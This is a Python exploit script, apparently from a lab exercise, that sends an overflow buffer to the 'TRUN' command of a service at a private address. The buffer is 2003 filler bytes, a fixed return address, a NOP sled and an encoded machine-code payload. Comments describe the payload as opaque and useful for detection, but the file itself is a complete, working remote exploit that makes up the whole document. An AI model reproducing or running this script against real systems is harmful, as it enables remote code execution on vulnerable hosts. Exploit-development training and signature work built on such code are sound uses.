tags: fuzzer_shellcode buffer_overflow python_offensive


#!/usr/bin/python3
import sys, socket
 
# Opaque machine-code payload appended to the end of the overflow buffer.
# Nothing in this file reveals what it does once executed; the leading
# bytes (fnstenv-style GetPC sequence) suggest a self-decoding/encoded
# stub, so its real behaviour is not determinable from this listing —
# treat it as untrusted binary content.  The raw byte sequence itself is
# the most useful artefact here for defenders (signature/IDS matching).
overflow = (b"\xd9\xe1\xd9\x74\x24\xf4\x5d\xba\x9b\xcc\x43\xea\x2b\xc9"
b"\xb1\x52\x31\x55\x17\x03\x55\x17\x83\x76\x30\xa1\x1f\x74"
b"\x21\xa4\xe0\x84\xb2\xc9\x69\x61\x83\xc9\x0e\xe2\xb4\xf9"
b"\x45\xa6\x38\x71\x0b\x52\xca\xf7\x84\x55\x7b\xbd\xf2\x58"
b"\x7c\xee\xc7\xfb\xfe\xed\x1b\xdb\x3f\x3e\x6e\x1a\x07\x23"
b"\x83\x4e\xd0\x2f\x36\x7e\x55\x65\x8b\xf5\x25\x6b\x8b\xea"
b"\xfe\x8a\xba\xbd\x75\xd5\x1c\x3c\x59\x6d\x15\x26\xbe\x48"
b"\xef\xdd\x74\x26\xee\x37\x45\xc7\x5d\x76\x69\x3a\x9f\xbf"
b"\x4e\xa5\xea\xc9\xac\x58\xed\x0e\xce\x86\x78\x94\x68\x4c"
b"\xda\x70\x88\x81\xbd\xf3\x86\x6e\xc9\x5b\x8b\x71\x1e\xd0"
b"\xb7\xfa\xa1\x36\x3e\xb8\x85\x92\x1a\x1a\xa7\x83\xc6\xcd"
b"\xd8\xd3\xa8\xb2\x7c\x98\x45\xa6\x0c\xc3\x01\x0b\x3d\xfb"
b"\xd1\x03\x36\x88\xe3\x8c\xec\x06\x48\x44\x2b\xd1\xaf\x7f"
b"\x8b\x4d\x4e\x80\xec\x44\x95\xd4\xbc\xfe\x3c\x55\x57\xfe"
b"\xc1\x80\xf8\xae\x6d\x7b\xb9\x1e\xce\x2b\x51\x74\xc1\x14"
b"\x41\x77\x0b\x3d\xe8\x82\xdc\x48\xe7\x8d\x11\x25\xf5\x8d"
b"\x38\xe9\x70\x6b\x50\x01\xd5\x24\xcd\xb8\x7c\xbe\x6c\x44"
b"\xab\xbb\xaf\xce\x58\x3c\x61\x27\x14\x2e\x16\xc7\x63\x0c"
b"\xb1\xd8\x59\x38\x5d\x4a\x06\xb8\x28\x77\x91\xef\x7d\x49"
b"\xe8\x65\x90\xf0\x42\x9b\x69\x64\xac\x1f\xb6\x55\x33\x9e"
b"\x3b\xe1\x17\xb0\x85\xea\x13\xe4\x59\xbd\xcd\x52\x1c\x17"
b"\xbc\x0c\xf6\xc4\x16\xd8\x8f\x26\xa9\x9e\x8f\x62\x5f\x7e"
b"\x21\xdb\x26\x81\x8e\x8b\xae\xfa\xf2\x2b\x50\xd1\xb6\x4c"
b"\xb3\xf3\xc2\xe4\x6a\x96\x6e\x69\x8d\x4d\xac\x94\x0e\x67"
b"\x4d\x63\x0e\x02\x48\x2f\x88\xff\x20\x20\x7d\xff\x97\x41"
b"\x54")
 
# Overflow buffer layout, in order: 2003 filler bytes of "C", a fixed
# 4-byte value (presumably a little-endian address written over a saved
# return pointer — the offset 2003 is hard-coded and target-specific),
# 32 x 0x90 (the x86 NOP opcode, i.e. a NOP sled), then the opaque payload
# above.  The long run of "C" bytes after the command prefix is a
# distinctive on-the-wire pattern that network detection can key on.
shellcode = b"C" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + overflow
 
# Deliver the buffer to a hard-coded host/port (private-range lab address);
# there is no argument parsing, timeout, or response handling.
try:
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect(('10.10.1.11', 9999))
    # Command prefix the listening service expects, followed by the
    # overflow buffer.  ("pyload" is a misspelling of "payload" — left as is.)
    pyload =b'TRUN /.:/' + shellcode
    # socket.send() may transmit fewer bytes than given; the return value is
    # not checked, so a short write goes unnoticed.
    soc.send(pyload)
    soc.close()
# Bare except: catches *everything* raised in the block (including
# KeyboardInterrupt and SystemExit) and reports every failure — connect,
# send, or otherwise — with the same "connection" message, which hides
# the real cause.  The socket is not closed on this path either.
except:
    print("Error: Unable to establish connection with Server")
    # sys.exit() with no argument exits with status 0, so a failure here is
    # indistinguishable from success to a calling shell or script.
    sys.exit()